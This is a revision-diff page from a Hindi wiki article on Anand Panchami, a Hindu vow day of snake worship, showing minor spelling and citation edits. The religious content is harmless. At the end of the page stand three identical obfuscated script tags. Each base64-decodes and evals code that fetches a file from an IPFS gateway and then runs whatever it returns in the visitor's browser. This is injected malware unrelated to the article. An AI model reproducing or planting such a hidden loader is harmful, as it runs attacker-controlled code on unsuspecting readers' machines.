Difference between revisions of "आनन्द पंचमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आनन्दपंचमी के दिन [[नाग|नागों]] की पूजा की जाती है।
 
*आनन्दपंचमी के दिन [[नाग|नागों]] की पूजा की जाती है।
 
*नागों के लिए [[पंचमी]] प्रिय होती है।
 
*नागों के लिए [[पंचमी]] प्रिय होती है।
 
*आनन्दपंचमी के दिन नागों (प्रतिमाओं) को [[दूध]] में नहलाया जाता है।
 
*आनन्दपंचमी के दिन नागों (प्रतिमाओं) को [[दूध]] में नहलाया जाता है।
*आनन्दपंचमी के दिन नाग भय से लोगों को मुक्त करते हैं।<ref>(हेमाद्रि व्रत खण्ड 1, 557-560)</ref>
+
*आनन्दपंचमी के दिन नाग भय से लोगों को मुक्त करते हैं।<ref>हेमाद्रि व्रत खण्ड 1, 557-560</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:40, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • anandapanchami ke din nagoan ki pooja ki jati hai.
  • nagoan ke lie panchami priy hoti hai.
  • anandapanchami ke din nagoan (pratimaoan) ko doodh mean nahalaya jata hai.
  • anandapanchami ke din nag bhay se logoan ko mukt karate haian.[1]

tika tippani aur sandarbh

  1. hemadri vrat khand 1, 557-560

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>